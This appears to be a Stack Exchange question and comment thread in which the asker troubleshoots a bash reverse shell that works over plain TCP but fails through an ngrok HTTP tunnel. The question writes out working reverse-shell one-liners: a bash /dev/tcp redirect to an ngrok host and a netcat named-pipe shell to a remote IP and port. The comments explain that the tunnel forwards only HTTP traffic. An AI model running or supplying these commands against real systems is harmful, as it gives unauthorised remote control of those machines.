
I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it's HTTP)
  • The connection fails; I don't even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I'm doing wrong?

NattyP
    HTTP is a protocol on top of TCP. You actually have to speak this protocol on example.ngrok.io port 80. Just search for [reverse shell over http](https://www.google.com/search?q=reverse+shell+over+http) for more details on how this can be done. – Steffen Ullrich Jul 01 '20 at 16:31
  • @SteffenUllrich I don't completely understand what you mean. All incoming traffic to example.ngrok.io over port 80 should be picked up by ngrok, so I should see it, but I'm not. (I use ngrok frequently for development). The Google Search you attached is pretty broad. There are examples of reverse shells on this Stack Overflow post, and I am having difficulty getting them to work, for the same reason described above: https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell#35271982 – NattyP Jul 01 '20 at 16:43
  • Please have a look at [Wikipedia: HTTP](https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Example_session). That's the protocol which is expected to be spoken on the socket: HTTP requests and HTTP responses. ngrok http will not forward anything which does not adhere to the HTTP protocol. If you want to use pure bash you need some local gateway which encapsulates any data into HTTP messages and you have to have a similar gateway at the other end. – Steffen Ullrich Jul 01 '20 at 17:08
  • @SteffenUllrich Ahh ok. Are you saying the command `bash -i >& /dev/tcp/example.ngrok.io/80 0>&1` does not work over HTTP? I.e. it's TCP only? If so, are you saying it's not possible to use that command to make an interactive bash shell available to someone over the web? I also tried the netcat command listed below, and that didn't work for me either. Am I understanding you correctly? – NattyP Jul 01 '20 at 18:10
  • Yes, your command only works with plain TCP where no specific application layer protocol is required. – Steffen Ullrich Jul 01 '20 at 18:21
  • @SteffenUllrich You're saying both the `bash` command and the `nc` command examples I showed don't work over HTTP? If that's true, do you know what a correct command would be to get this to work over HTTP? – NattyP Jul 01 '20 at 18:50
  • I know that netcat does provide HTTP support - maybe I'm just not supplying the correct command? – NattyP Jul 01 '20 at 18:50
  • Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/110105/discussion-between-steffen-ullrich-and-nattyp). – Steffen Ullrich Jul 01 '20 at 19:35

0 Answers